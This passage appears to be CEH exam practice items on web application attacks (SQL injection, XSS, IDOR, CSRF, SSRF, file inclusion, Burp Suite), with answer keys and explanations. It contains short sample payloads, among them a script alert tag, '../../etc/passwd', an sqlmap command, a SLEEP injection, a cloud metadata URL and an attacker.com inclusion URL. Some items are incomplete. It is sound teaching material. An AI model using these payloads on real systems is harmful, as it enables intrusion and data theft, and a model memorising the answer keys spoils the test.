Option A is wrong because Burp Suite is a general-purpose web proxy and scanner that can detect some SQLi but is not specifically designed to automate SQL injection exploitation. Option B is wrong because Nikto is a web server scanner that identifies misconfigurations and known vulnerabilities but does not automate SQLi exploitation. Option C is wrong because Metasploit is a general exploitation framework that can leverage SQLi modules but is not purpose-built for automated SQLi detection and exploitation.
A penetration tester uses SQLMap with the option '--technique=T --dbms=MySQL --level=5 --risk=3' against a login form. The tool returns results after a delay of several seconds per request. Which SQL injection technique is being used?
A.Out-of-band SQL injection
B.Time-based blind SQL injection
C.Error-based SQL injection
D.Boolean-based blind SQL injection
AnswerB
Time-based blind SQL injection is a technique where the attacker infers information by observing the time it takes for the database server to respond to specific queries. By introducing conditional delays (e.g., IF(condition, SLEEP(5), 0)), the presence or absence of a delay indicates whether the condition is true or false. The 'T' option in sqlmap explicitly instructs the tool to employ this method, making it the correct answer.
Why this answer
The 'T' in --technique stands for Time-based blind SQL injection. The delay indicates time-based injection where the database sleeps to cause a response delay.
During a penetration test, a security analyst discovers that a web application uses sequential numeric identifiers in URLs (e.g., /profile?id=100). By modifying the id parameter, the analyst can access another user's profile data without authorization. Which vulnerability is being exploited?
A.SQL injection
B.Insecure Direct Object Reference (IDOR)
C.Server-Side Request Forgery (SSRF)
D.Cross-Site Request Forgery (CSRF)
AnswerB
Insecure Direct Object Reference (IDOR) occurs when an application exposes a direct reference to an internal implementation object, such as a file, directory, or database record, and fails to implement sufficient authorization checks. By manipulating parameters like 'id' in a URL or API request, an attacker can bypass authorization and access resources belonging to other users or system components. This direct manipulation of object identifiers to gain unauthorized access perfectly describes the scenario where changing an 'id' parameter reveals another user's data.
Why this answer
Insecure Direct Object Reference (IDOR) occurs when an application exposes an internal object identifier, such as a numeric id in a URL, and fails to verify that the requester is authorized to access that object. Changing the id to another user's value and retrieving their data is the classic IDOR exploitation pattern.
Exam trap
The trap is confusing IDOR with CSRF or SSRF because all involve manipulating requests, but IDOR specifically hinges on unauthorized access to an object via a client-controlled identifier.
How to eliminate wrong answers
Option A is wrong because SQL injection involves injecting SQL syntax into input to manipulate database queries, which is not what happens when simply changing an id parameter. Option C is wrong because SSRF tricks the server into making requests to internal or external resources, not accessing another user's record via an identifier. Option D is wrong because CSRF forces an authenticated user's browser to send unintended requests, whereas here the analyst directly modifies the identifier and receives unauthorized data.
A security analyst is reviewing HTTP response headers and notices the following: Set-Cookie: sessionId=abc123; SameSite=Lax. What is the primary purpose of the SameSite attribute?
A.To enforce HTTPS for cookie transmission
B.To prevent the cookie from being accessed by JavaScript
D.To ensure the cookie is only sent over HTTP and not FTP
AnswerC
The SameSite cookie attribute directly addresses Cross-Site Request Forgery (CSRF) attacks by restricting when a browser sends cookies with cross-site requests. By setting SameSite to Lax or Strict, the browser will not attach the session cookie to requests originating from a different site, effectively preventing an attacker's forged request from being authenticated by the victim's browser. This significantly reduces the risk of unauthorized actions being performed on behalf of the user without their explicit intent.
Why this answer
SameSite=Lax prevents the browser from sending the cookie in cross-site requests initiated by third-party websites, mitigating CSRF attacks.
Which Burp Suite tool is specifically designed to automate customized attacks on web applications, such as brute-forcing login forms or fuzzing parameters?
A.Repeater
B.Proxy
C.Scanner
D.Intruder
AnswerD
Burp Intruder is specifically engineered for automating customized attacks against web applications, making it ideal for brute-forcing, fuzzing, and credential stuffing. It allows users to define specific insertion points within a request and then systematically iterate through custom payload lists, applying various attack types like Sniper, Battering Ram, Pitchfork, and Cluster Bomb. This precise control over payload generation and delivery makes it the tool of choice for automating targeted attack scenarios.
Why this answer
Burp Intruder is the tool for automating customized attacks like brute-forcing and fuzzing.
A web application allows users to submit feedback that is stored in a database and later displayed to administrators. An attacker submits feedback containing <script>alert('stored')</script>. When an admin views the feedback page, the script executes. Which type of XSS is this?
A.Blind XSS
B.Reflected XSS
C.Stored XSS
D.DOM-based XSS
AnswerC
Stored XSS, also known as Persistent XSS, is a severe web vulnerability where a malicious script is permanently saved on the target server, typically within a database, comment section, or feedback system. When a legitimate user, such as an administrator, later retrieves and views the compromised data, their browser executes the embedded script without their knowledge. This allows the attacker to compromise user sessions, deface websites, or redirect victims, making it a highly impactful vulnerability due to its persistence and widespread potential.
Why this answer
Stored XSS occurs when malicious script is persisted on the server (e.g., in a database, comment field, or log) and later served to other users without proper output encoding. Here, the attacker's <script> payload is saved as feedback and executed when the admin views the page, which is the defining characteristic of stored (persistent) XSS. The payload executes in the admin's browser session, potentially stealing cookies or performing actions as the admin.
Exam trap
CEH often tests the confusion between stored and reflected XSS — candidates see a script tag and assume reflected, but the key differentiator is whether the payload is persisted server-side (stored) or echoed back from the immediate request (reflected).
How to eliminate wrong answers
Option A is wrong because blind XSS is a variant of stored XSS where the attacker cannot see the immediate result and the payload fires in a different application context (e.g., admin panel or log viewer) — while related, the question describes a straightforward stored scenario where the payload is stored and displayed on the same feedback page. Option B is wrong because reflected XSS requires the payload to be included in the immediate request (e.g., a URL parameter) and reflected back in the response without server-side storage; here the payload is stored in a database. Option D is wrong because DOM-based XSS occurs entirely client-side when JavaScript reads from a source like location.hash and writes to a sink like innerHTML, without server-side involvement; the question explicitly states the feedback is stored in a database and later displayed.
A penetration tester discovers that a web application includes the following code: 'include($_GET['page'] . '.php');' and the application is running on a Linux server. The tester attempts to exploit this by accessing 'index.php?page=../../etc/passwd'. What type of attack is this, and will it succeed?
A.Directory traversal; it will succeed because '../' bypasses restrictions
B.Remote File Inclusion (RFI); it will succeed because the parameter is not filtered
C.Command injection; it will succeed if the server interprets PHP code
D.Local File Inclusion (LFI); it will not succeed because the '.php' extension is appended
AnswerD
Local File Inclusion (LFI) is the correct classification for this vulnerability, as it involves an attempt to include files present on the web server's local file system. However, the crucial detail preventing immediate success is the automatic appending of the ".php" extension to the user-supplied input. This means an attempt to include a file like "/etc/passwd" would result in the application trying to include "/etc/passwd.php", which typically does not exist, thereby blocking direct access to the target file without further bypass techniques.
Why this answer
This is a Local File Inclusion (LFI) vulnerability. The appended '.php' extension prevents reading '/etc/passwd' because the file would be interpreted as '/etc/passwd.php', which does not exist.
An analyst notices that a web application's login page returns a generic 'Invalid credentials' message regardless of whether the username is valid. This is an example of which security control?
A.Anti-CSRF token
B.Account lockout policy
C.Generic error messages
D.Rate limiting
AnswerC
Generic error messages, such as "Invalid username or password," are a crucial defense against username enumeration vulnerabilities. By providing the exact same response regardless of whether the submitted username is valid but the password is wrong, or if the username itself does not exist in the system, the application denies attackers the ability to differentiate between these two states. This ambiguity prevents an attacker from systematically testing a list of potential usernames to identify which ones are registered within the system.
Why this answer
The login page returns a generic 'Invalid credentials' message regardless of whether the username is valid. This is a deliberate security control known as generic error messages, which prevents username enumeration by not revealing whether an account exists. By using the same message for both invalid usernames and incorrect passwords, attackers cannot easily determine valid usernames, thus reducing the attack surface for brute-force or credential-stuffing attacks.
Exam trap
CEH often tests the confusion between different security controls that mitigate brute-force attacks, such as account lockout, rate limiting, and generic error messages, and candidates may incorrectly choose account lockout or rate limiting when the scenario specifically describes identical error messages for all failed logins.
How to eliminate wrong answers
Option A is wrong because anti-CSRF tokens are used to prevent cross-site request forgery attacks by ensuring that requests originate from the legitimate application, not to obscure authentication error messages. Option B is wrong because account lockout policies lock accounts after a number of failed login attempts, which is a different control that does not directly address the information leakage from error messages. Option D is wrong because rate limiting restricts the number of requests from a single source over time to mitigate brute-force attacks, but it does not control the content of error messages returned to the user.
A security analyst observes that a web application's login page responds with different HTTP status codes and response times for valid versus invalid usernames. This information leakage could be used to perform which type of authentication attack?
A.Username enumeration
B.Credential stuffing
C.Password spraying
D.Brute force attack
AnswerA
Username enumeration is an attack where an attacker attempts to discover valid usernames by observing differences in application responses (e.g., distinct error messages, varying HTTP status codes, or even subtle timing discrepancies) when submitting valid versus invalid usernames. For instance, a "User not found" message for an invalid username compared to an "Incorrect password" message for a valid one clearly indicates a username's existence, allowing an attacker to compile a list of active accounts. This technique is a critical precursor to many other credential-based attacks.
Why this answer
Username enumeration occurs when an application's responses (status codes, error messages, or timing) differ based on whether a submitted username exists. Attackers exploit this discrepancy to build a list of valid usernames before launching targeted password attacks. The scenario explicitly describes different HTTP status codes and response times for valid versus invalid usernames, which is the textbook signature of username enumeration.
Exam trap
CEH often tests the distinction between enumeration (discovering valid usernames via response differences) and password attacks (stuffing, spraying, brute force), tempting candidates to pick a password attack when the question describes information leakage.
How to eliminate wrong answers
Option B is wrong because credential stuffing uses previously breached username/password pairs against a login form; it does not rely on distinguishing valid from invalid usernames via response differences. Option C is wrong because password spraying tries a small number of common passwords across many accounts to avoid lockouts; it is a password-guessing technique, not an information-leakage attack. Option D is wrong because brute force systematically tries many passwords against a single account; while it may benefit from knowing a valid username, the described behavior (differential responses) is the enumeration vulnerability itself, not the brute-force attack.
A penetration tester uses a tool to intercept and modify HTTP/HTTPS requests in real-time between the browser and the web application. Which tool is being used?
A.SQLMap
B.Burp Suite Proxy
C.Nmap
D.Metasploit
AnswerB
Burp Suite Proxy is a core component of the Burp Suite platform, specifically engineered to sit between a web browser and a target web server. It functions as an intercepting HTTP/S proxy, allowing a penetration tester to view, modify, and replay individual requests and responses in real-time before they reach their destination. This capability is fundamental for identifying vulnerabilities by manipulating parameters, headers, and other traffic components.
Why this answer
Burp Suite Proxy is the industry-standard tool for intercepting, inspecting, and modifying HTTP/HTTPS traffic between a browser and a web application in real time. It acts as a man-in-the-middle proxy with a CA certificate installed in the browser to decrypt TLS, enabling request/response tampering during penetration tests.
Exam trap
CEH often tests the distinction between interception proxies (Burp, ZAP) and exploitation/scanner tools (SQLMap, Metasploit, Nmap) — candidates may pick SQLMap because it also targets web apps, but it does not intercept traffic.
How to eliminate wrong answers
Option A is wrong because SQLMap automates SQL injection detection and exploitation; it does not provide interactive HTTP/HTTPS interception and modification. Option C is wrong because Nmap is a network scanner for host discovery, port scanning, and service/version detection — it does not intercept application-layer traffic. Option D is wrong because Metasploit is an exploitation framework for delivering payloads and managing sessions, not a browser proxy for real-time HTTP manipulation.
Blind SQL injection extracts data without visible output or errors, relying on boolean true/false responses or deliberate time delays to infer database contents. This distinct technique satisfies the question's requirement for a recognised SQL injection category, alongside in-band and out-of-band variants.
Why this answer
Blind SQL injection (C) is a recognized SQLi type where the attacker gets no direct data in the response and instead infers information via boolean true/false queries or time delays (e.g., WAITFOR DELAY, SLEEP). In-band SQL injection (D) is the classic SQLi category where results are returned through the same channel used to inject, typically via error-based or UNION-based techniques. Out-of-band SQL injection (E) is also a valid SQLi type that uses a different channel (e.g., DNS or HTTP requests via xp_dirtree or UTL_HTTP) to exfiltrate data when in-band and blind methods are not viable.
The other options do not belong: DOM-based SQL injection (A) is not a SQLi category (DOM-based is a type of XSS), and stored SQL injection (B) is not a standard SQLi classification (stored XSS is a distinct vulnerability).
Exam trap
The trap here is that candidates often confuse 'DOM-based' (an XSS attack) with a SQL injection type, or mistakenly think 'Stored SQL injection' is a primary category, when the CEH exam strictly recognizes in-band, blind, and out-of-band as the three main types of SQL injection attacks.
Which of the following is a common defense against clickjacking attacks?
A.CSRF tokens
B.Content Security Policy (CSP) with 'frame-ancestors' directive
C.SameSite cookies
D.Input validation
AnswerB
The `Content-Security-Policy` (CSP) header with the `frame-ancestors` directive explicitly defines which origins are permitted to embed the current resource in a frame, iframe, object, or embed tag. By restricting framing to 'self' or specific trusted domains (e.g., `frame-ancestors 'self'`), this policy directly prevents malicious external websites from embedding the target page. This robust defense effectively mitigates clickjacking attacks by controlling the contexts in which a page can be framed, thereby preventing UI redressing.
Why this answer
Clickjacking attacks trick users into clicking on a hidden or disguised element on a page that is embedded in a malicious frame. The Content Security Policy (CSP) directive 'frame-ancestors' is a modern and effective defense against clickjacking. It allows the server to specify which origins are permitted to embed the page in frames, providing granular control.
For example, 'frame-ancestors none' blocks all embedding, while 'frame-ancestors self' allows same-origin framing only. This directive supersedes the older X-Frame-Options header, which only supports DENY or SAMEORIGIN and is less flexible. Therefore, CSP with 'frame-ancestors' is the correct choice among the given options.
A security analyst notices that a web application uses sequential numeric IDs for user accounts (e.g., /profile?id=1001). By changing the ID to 1002, the analyst can view another user's profile. Which vulnerability is present?
A.SQL injection
B.IDOR
C.Directory traversal
D.CSRF
AnswerB
Insecure Direct Object Reference (IDOR) vulnerabilities arise when an application exposes a direct reference to an internal implementation object, such as a file, directory, or database record, without sufficient authorization checks. By simply changing a numeric ID in the URL, the security analyst is directly accessing another object that they should not be authorized to view or modify, demonstrating a clear failure in access control for that specific resource.
Why this answer
This is an IDOR (Insecure Direct Object Reference) vulnerability, where direct access to objects is not properly restricted.
Which of the following is a common indicator of a stored (persistent) Cross-Site Scripting (XSS) attack?
A.A script executes in the victim's browser without any server interaction
B.A script is permanently stored on the server and executed when users view a page
C.A script is executed when a user submits a form with malicious input
D.A script executes only after clicking a manipulated URL
AnswerB
Stored XSS occurs when attacker-supplied script is persisted server-side, for example in a database or comment field, and then served to every visitor viewing the affected page. That permanent server-side storage and execution on page view is the defining indicator distinguishing it from reflected XSS.
Why this answer
Stored (persistent) XSS occurs when malicious script is permanently stored on the server (e.g., in a database, comment field, or forum post) and is served to every user who views the affected page. The script executes in the victim's browser without requiring any additional interaction, as it is part of the page's HTML response from the server.
Exam trap
The trap here is that candidates confuse stored XSS with reflected XSS, mistakenly thinking that any script execution without user interaction (Option A) is stored XSS, when in fact stored XSS specifically requires the payload to be persisted on the server and served to multiple users.
How to eliminate wrong answers
Option A is wrong because it describes reflected XSS or DOM-based XSS, where the script executes without server interaction (e.g., via client-side JavaScript manipulation), but stored XSS requires the server to serve the stored payload. Option C is wrong because it describes a reflected XSS scenario where the script executes immediately upon form submission, not after being stored and later retrieved. Option D is wrong because it describes reflected XSS where the payload is in a manipulated URL and executes only after the victim clicks that link, not a persistent server-side storage.
Which of the following is the BEST defense against Cross-Site Request Forgery (CSRF) attacks?
A.SameSite cookies
B.Input validation
C.Output encoding
D.CSRF tokens
AnswerD
CSRF tokens are unique, unpredictable, and secret values generated by the server and embedded into forms or URLs for state-changing operations. When a user submits a request, the server verifies that the token included in the request matches the one stored in the user's session. This mechanism effectively prevents CSRF attacks because an attacker cannot forge a valid request without knowing the user's unique, session-specific token, which is not accessible to them.
Why this answer
CSRF tokens are the most robust defense against Cross-Site Request Forgery because they require the client to include a unique, unpredictable token in state-changing requests. The server validates the token, ensuring the request originated from the legitimate application. This prevents attackers from forging requests because they cannot guess or obtain the token.
Exam trap
CEH often tests the difference between CSRF and XSS defenses, tricking candidates into selecting input validation or output encoding when the question specifically asks about CSRF.
How to eliminate wrong answers
Option A is wrong because SameSite cookies are a defense-in-depth measure that can help mitigate CSRF, but they are not foolproof (e.g., they may not work on older browsers or with certain configurations) and are not the best defense. Option B is wrong because input validation does not prevent CSRF; it addresses injection attacks. Option C is wrong because output encoding prevents XSS, not CSRF.
A penetration tester finds that a web application includes files based on user input without proper validation. The tester supplies 'http://attacker.com/malicious.txt' and the application includes its content. Which vulnerability is this?
A.Directory traversal
B.Remote File Inclusion (RFI)
C.Local File Inclusion (LFI)
D.Server-Side Request Forgery (SSRF)
AnswerB
Remote File Inclusion (RFI) occurs when a web application dynamically includes a file from a remote server, typically specified by a URL in user-controlled input. This vulnerability allows an attacker to inject and execute malicious code hosted on their own server within the context of the vulnerable web application. The application fetches the remote file (e.g., via HTTP) and processes its content as if it were a local script, leading to potential arbitrary code execution.
Why this answer
The scenario describes a web application that includes files based on user input without proper validation, and the tester supplies a remote URL (http://attacker.com/malicious.txt) which the application then includes. This is the definition of Remote File Inclusion (RFI), where an attacker can include a file from a remote server, often leading to remote code execution. RFI is possible when the application uses user-supplied input in file inclusion functions (e.g., include, require in PHP) and allows remote URLs.
The key indicator is the inclusion of a file from an external domain, which is RFI.
Exam trap
CEH often tests the confusion between RFI and LFI, where candidates might see 'file inclusion' and pick LFI without noting that the supplied input is a remote URL, which specifically indicates RFI.
How to eliminate wrong answers
Option A is wrong because directory traversal (path traversal) involves accessing files outside the intended directory using sequences like '../', but it does not involve including remote files from external servers. Option C is wrong because Local File Inclusion (LFI) involves including files that reside on the local server, not remote ones; the tester supplied a remote URL, so it is not LFI. Option D is wrong because Server-Side Request Forgery (SSRF) involves the server making requests to internal or external resources, but it does not necessarily include the content of the file into the application's output; here, the application includes the content, which is characteristic of RFI.
During a web application penetration test, a tester discovers a file inclusion vulnerability. Which THREE of the following are potential impacts or exploitation scenarios? (Choose THREE.)
Select 3 answers
A.Disclosure of sensitive files like /etc/passwd
B.Remote code execution via log poisoning
C.Port scanning of internal network hosts
D.Denial of service by including large files
E.Session hijacking by including session files
AnswersA, B, E
Local File Inclusion (LFI) vulnerabilities allow an attacker to read arbitrary files from the server's file system. By manipulating the vulnerable parameter with paths like /etc/passwd or /etc/shadow, an attacker can directly access and disclose critical system configuration files, user credentials, or application source code. This exposure of sensitive data is a primary and direct impact of LFI, providing valuable information for further exploitation.
Why this answer
Option A is correct because a Local File Inclusion (LFI) vulnerability allows an attacker to traverse the filesystem using sequences like ../../ and read arbitrary files the web server can access, with /etc/passwd being the classic proof-of-concept target for confirming file disclosure on Linux. Option B is correct because LFI can be escalated to Remote Code Execution through log poisoning: the attacker injects PHP code into a log file (e.g., Apache access.log via a crafted User-Agent header) and then includes that log file, causing the server to execute the injected code. Option E is correct because if PHP session files are stored in a predictable, web-accessible location (e.g., /var/lib/php/sessions/sess_<id>), an attacker who can control or know a session ID can include that file to read or manipulate session data, enabling session hijacking.
Option C is not a typical LFI impact: port scanning is associated with SSRF, where the server makes outbound requests to internal hosts, not with file inclusion, which reads local files. Option D is not a standard LFI impact either: while including very large files could theoretically consume resources, denial of service is not a recognized primary exploitation scenario for file inclusion vulnerabilities in this context.
Exam trap
CEH often tests whether candidates confuse file inclusion impacts with SSRF-style impacts (like port scanning) or generic DoS, when the exam expects the three canonical outcomes: file disclosure, RCE via log poisoning, and session hijacking.
A web developer wants to mitigate CSRF attacks. Which of the following configurations for cookies is most effective when combined with CSRF tokens?
A.HttpOnly flag
B.SameSite=Strict
C.Domain attribute
D.Secure flag
AnswerB
The SameSite=Strict attribute is a powerful defense against CSRF attacks by instructing the browser to only send the cookie with requests originating from the same site as the cookie's domain. This means if a user is logged into `example.com` and then visits `malicious.com`, any requests `malicious.com` attempts to make back to `example.com` will not include the session cookie. Consequently, the malicious request will not be authenticated, effectively preventing the forgery.
Why this answer
SameSite=Strict prevents the browser from sending cookies for cross-site requests, which blocks CSRF attacks.
Which of the following is the most effective defense against Cross-Site Request Forgery (CSRF) attacks?
A.Content Security Policy (CSP)
B.CSRF tokens
C.Rate limiting
D.Input validation
AnswerB
CSRF tokens are the most effective defense against Cross-Site Request Forgery (CSRF) attacks. These unique, unpredictable, and secret values are generated server-side for each user session and embedded within critical state-changing requests, such as form submissions. The server then validates the presence and correctness of this token upon receiving the request, ensuring that the request originated from the legitimate application and not from an attacker's malicious site.
Why this answer
CSRF tokens are the most effective defense because they are unique, unpredictable values embedded in each form or request that the server validates. Without a valid token, the server rejects the request, preventing an attacker from forging a legitimate user's action even if the victim is authenticated.
Exam trap
EC-Council often tests the misconception that input validation or CSP can prevent CSRF, when in fact CSRF exploits the browser's automatic inclusion of credentials (cookies) and requires a server-side token or SameSite cookie attribute to verify request intent.
How to eliminate wrong answers
Option A is wrong because Content Security Policy (CSP) is primarily designed to mitigate XSS and data injection attacks by controlling resource loading, not to validate the origin or authenticity of state-changing requests. Option C is wrong because rate limiting only reduces the speed of repeated attacks but does not prevent a single forged request from being executed. Option D is wrong because input validation (e.g., sanitizing or escaping user input) addresses injection attacks like SQLi or XSS, not the lack of origin verification that CSRF exploits.
A penetration tester is performing a check for HTTP response splitting. Which THREE of the following conditions must be present for this attack to succeed?
Select 3 answers
A.The application reflects user input in the HTTP response headers
B.The application reflects user input in the HTTP response body
C.The application uses HTTPS exclusively
D.The attacker can inject multiple header lines to create a second HTTP response
E.The application does not sanitize or encode CRLF sequences (%0d%0a)
AnswersA, D, E
For HTTP Response Splitting to occur, user-supplied input containing CRLF sequences must be directly incorporated into an HTTP response header. This allows an attacker to terminate the current header line and inject new, arbitrary header fields or even an entirely new response body. Without this direct reflection in the headers, the injected CRLF sequences would not be interpreted as control characters for the HTTP protocol, making the attack impossible.
Why this answer
HTTP response splitting succeeds when three conditions align. Option A is correct because the application must reflect attacker-controlled input into HTTP response headers (e.g., a Location or Set-Cookie header), which is the injection point for the attack. Option E is correct because the reflected input must contain unsanitized CRLF sequences (%0d%0a), since these carriage-return/line-feed characters terminate the current header and let the attacker start new ones.
Option D is correct because the injected CRLF must be sufficient to forge additional header lines and a second HTTP response body, which is the actual splitting effect. Option B is not required: reflection in the response body alone does not let the attacker manipulate header boundaries. Option C is irrelevant: HTTPS encrypts transport but does not prevent header injection, and the attack works over HTTP or HTTPS alike.
Exam trap
CEH often tests whether candidates confuse response splitting with reflected XSS — both involve unsanitized input reflection, but response splitting specifically requires header reflection and CRLF injection, not body reflection.
Which TWO of the following are effective defenses against SQL injection attacks?
Select 2 answers
A.Implementing stored procedures with dynamic SQL
B.Disabling error messages
C.Using an ORM that generates parameterized queries
D.Using prepared statements with parameterized queries
E.Escaping user input with addslashes()
AnswersC, D
Object-Relational Mappers (ORMs) provide an effective defense against SQL injection by abstracting database interactions and typically generating parameterized queries. Instead of concatenating user input directly into SQL strings, ORMs bind input values as parameters, ensuring they are treated as data and not executable code. This fundamental separation prevents malicious input from altering the query's structure, thereby neutralizing injection attempts.
Why this answer
Option C is correct because ORMs that generate parameterized queries separate SQL code from user-supplied data, so input is bound as data rather than concatenated into the statement, which prevents injection payloads from altering query structure. Option D is correct because prepared statements with parameterized queries send the SQL template to the database first and bind parameters afterward, ensuring untrusted input cannot change the query's logic. Option A is not effective because stored procedures that build dynamic SQL internally still concatenate user input, reintroducing the injection risk.
Option B is not a defense because hiding error messages only reduces information disclosure; it does not stop malicious SQL from executing. Option E is not reliable because addslashes() is a weak, context-unaware escaping function that fails against many encodings and database-specific syntax, so it should not be used as a primary SQL injection defense.
Exam trap
CEH often tests the misconception that input escaping (addslashes, magic quotes) or hiding errors is a sufficient SQLi defense — the exam expects you to recognize that only parameterization separates code from data.
A penetration tester attempts a SQL injection on a login form and receives no error messages, but notices a delay in the server response when injecting ' OR SLEEP(5)--. Which type of SQL injection is this?
A.Union-based SQL injection
B.Boolean-based blind SQL injection
C.Time-based blind SQL injection
D.Error-based SQL injection
AnswerC
Time-based blind SQL injection is the appropriate technique when the application provides no direct output and no discernible boolean difference in its responses. This method relies on making the database server pause for a specific duration (e.g., using `SLEEP()`, `WAITFOR DELAY`, or `PG_SLEEP()`) if a particular injected condition is met. By measuring the time taken for the server to respond, the penetration tester can infer the truthfulness of conditions and extract data character by character.
Why this answer
Time-based blind SQL injection relies on inducing a time delay to infer the truth of a condition, as no error or data is returned.
Which of the following best describes a Server-Side Request Forgery (SSRF) attack?
A.An attacker tricks the server into making requests to internal or external resources
B.An attacker sends a malicious script that executes in a user's browser
C.An attacker forges HTTP requests to perform actions on behalf of an authenticated user
D.An attacker injects SQL commands into a database query
AnswerA
Server-Side Request Forgery (SSRF) occurs when an attacker exploits a vulnerability in a web application to compel the server itself to make arbitrary requests. These requests can target internal network resources, such as other services, databases, or cloud metadata APIs, which are typically inaccessible directly from the internet. The server acts as a proxy, fetching data or performing actions on behalf of the attacker, often bypassing firewall rules and network segmentation. This allows for reconnaissance, port scanning, and even direct interaction with sensitive internal systems.
Why this answer
A Server-Side Request Forgery (SSRF) attack occurs when an attacker manipulates a vulnerable server into making HTTP requests to arbitrary destinations, often bypassing network segmentation to access internal resources (e.g., 127.0.0.1, RFC 1918 addresses) or external services. The server acts as a proxy, allowing the attacker to interact with systems that are not directly reachable, such as cloud metadata endpoints (e.g., AWS http://169.254.169.254/latest/meta-data/) or internal databases.
Exam trap
The trap here is that candidates often confuse SSRF with CSRF (Option C) because both involve forged requests, but SSRF targets the server's ability to make requests to internal resources, while CSRF targets the user's browser to perform actions on their behalf.
How to eliminate wrong answers
Option B is wrong because it describes Cross-Site Scripting (XSS), where malicious scripts execute in a user's browser, not server-side requests. Option C is wrong because it describes Cross-Site Request Forgery (CSRF), where an attacker forges requests to perform actions on behalf of an authenticated user, but the server is tricked into sending requests to internal resources, not the user's browser. Option D is wrong because it describes SQL injection, where malicious SQL commands are injected into a database query, not HTTP requests made by the server.
A penetration tester uses SQLMap with the following command: sqlmap -u 'http://target.com/page?id=1' --batch --dbs. Which of the following best describes what this command will do?
A.Enumerate all database names in non-interactive mode
B.Dump the entire contents of the current database
C.Perform a time-based blind SQL injection to extract data
D.Enumerate all tables in all databases
AnswerA
The `--dbs` option explicitly instructs sqlmap to enumerate and display the names of all accessible databases on the target system by querying the database's information schema or system tables. Concurrently, the `--batch` option ensures that sqlmap operates in a non-interactive mode, automatically accepting default choices and proceeding without requiring user input for any prompts or questions that might arise during the enumeration process. This combination efficiently retrieves database names without interruption, which is ideal for automated scripting.
Which Burp Suite tool is specifically designed to intercept and modify HTTP(S) traffic between the browser and the target web application?
A.Intruder
B.Scanner
C.Repeater
D.Proxy
AnswerD
Burp Proxy is the core interception component of Burp Suite, acting as a man-in-the-middle between the browser and the target web server. It is specifically designed to capture all HTTP and HTTPS traffic flowing through it, allowing security professionals to view, analyze, and modify requests and responses in real-time before they reach their destination. This real-time interception capability is fundamental for understanding application logic, identifying vulnerabilities, and manipulating data during penetration testing.
Why this answer
The Burp Suite Proxy is the core component that sits between the browser and the target web application, acting as a man-in-the-middle to intercept, inspect, and modify HTTP(S) requests and responses in real time. It is specifically designed for this interception and modification task, allowing testers to manually tamper with traffic before it reaches the server or client. Other tools like Intruder, Scanner, and Repeater rely on the Proxy to capture and forward traffic but do not themselves perform the initial interception and modification of live traffic.
Exam trap
CEH often tests the confusion between tools that rely on captured traffic (Repeater, Intruder) and the tool that actually performs the interception (Proxy), so candidates must remember that Proxy is the only component designed for live interception and modification.
How to eliminate wrong answers
Option A is wrong because Intruder is an automated attack tool used for fuzzing and brute-forcing parameters, not for intercepting and modifying live traffic. Option B is wrong because Scanner is an automated vulnerability scanner that crawls and audits applications, but it does not provide interactive interception and modification of HTTP(S) traffic. Option C is wrong because Repeater is a manual tool for editing and resending individual requests, but it does not intercept traffic between the browser and server in real time; it operates on requests already captured.
A web application tester notices that the application reflects user input in the URL without proper encoding. The tester submits a payload <script>alert('xss')</script> in a search field and the script executes in the browser. Which type of XSS vulnerability is this MOST likely?
A.Blind XSS
B.Reflected XSS
C.Stored (persistent) XSS
D.DOM-based XSS
AnswerB
Reflected XSS occurs when a malicious script injected into an HTTP request is immediately returned in the server's HTTP response without being permanently stored. The payload is non-persistent, executing only once in the victim's browser as part of that specific request and response cycle. The observation that the application 'reflects' the input directly aligns with this immediate, one-time execution characteristic, making it the correct answer.
Why this answer
Option B is correct because reflected XSS occurs when user input is immediately returned by the web server in the response without proper encoding, causing the script to execute in the victim's browser. The scenario describes a search field where the payload is reflected in the URL and executes, which is classic reflected XSS.
Exam trap
CEH often tests the confusion between reflected and DOM-based XSS; candidates may pick DOM-based because the payload is in the URL, but the key differentiator is whether the server reflects the input (reflected) or the client-side script processes it (DOM-based).
How to eliminate wrong answers
Option A is wrong because blind XSS occurs when the payload is stored and executed later in a different context, often in an admin panel, and the attacker does not see immediate results. Option C is wrong because stored XSS involves the payload being persisted on the server (e.g., in a database) and served to other users, not immediately reflected. Option D is wrong because DOM-based XSS occurs entirely on the client side when JavaScript modifies the DOM using untrusted input, without server involvement; here the input is reflected by the server.
A web application is vulnerable to server-side request forgery (SSRF). An attacker sends a request that causes the server to make an internal HTTP request to http://169.254.169.254/latest/meta-data/. What is the attacker attempting to achieve?
A.Exploit a command injection vulnerability in the web server
B.Access the cloud instance metadata to obtain temporary credentials
C.Perform a denial-of-service attack on the internal network
D.Perform a port scan on the internal network
AnswerB
This is the most common and impactful exploitation path for SSRF when targeting cloud environments. Cloud providers like AWS, GCP, and Azure expose local metadata services (e.g., http://169.254.169.254 for AWS EC2) that provide critical information about the running instance, including temporary security credentials (IAM roles), network configuration, and user data. By leveraging SSRF to access these endpoints, an attacker can obtain sensitive credentials, potentially escalating privileges and gaining access to other cloud resources.
Why this answer
The IP address 169.254.169.254 is the link-local address used by AWS EC2 Instance Metadata Service (IMDS). When an SSRF vulnerability forces the server to request this URL, the attacker is attempting to retrieve instance metadata, which can include IAM role temporary credentials, instance identity documents, and user data. These credentials can then be used to pivot into the AWS account.
Exam trap
CEH often tests the specific IP 169.254.169.254 as the cloud metadata endpoint; candidates who do not recognize it may incorrectly assume the attacker is performing a port scan or DoS instead of credential theft.
How to eliminate wrong answers
Option A is wrong because SSRF does not execute OS commands; command injection requires unsanitized input passed to a shell, which is a different vulnerability class. Option C is wrong because a single metadata request does not generate enough traffic to cause a denial-of-service; SSRF is used for data exfiltration or pivoting, not volumetric attacks. Option D is wrong because port scanning requires the attacker to control the target host and port across many requests; the metadata endpoint is a single known service, not a scanning target.
Which of the following describes a Server-Side Request Forgery (SSRF) attack?
A.An attacker tricks a user into clicking a link that executes unwanted actions on a web application where the user is authenticated.
B.An attacker injects malicious scripts into a web page that executes in other users' browsers.
C.An attacker forces the web server to make HTTP requests to arbitrary destinations, potentially accessing internal resources.
D.An attacker manipulates input to execute system commands on the server.
AnswerC
This precisely defines Server-Side Request Forgery (SSRF), a vulnerability where a web application is tricked into making HTTP requests to an attacker-specified location. The server, acting on behalf of the attacker, can then access internal network resources, metadata services, or other systems that are typically inaccessible from the external internet. This allows for internal network reconnaissance, port scanning, and potential data exfiltration by bypassing firewall restrictions.
Why this answer
SSRF occurs when an attacker manipulates a server-side application into making HTTP requests to attacker-chosen destinations. Because the request originates from the server, it can reach internal-only resources (metadata endpoints, internal APIs, databases) that the attacker cannot access directly.
Exam trap
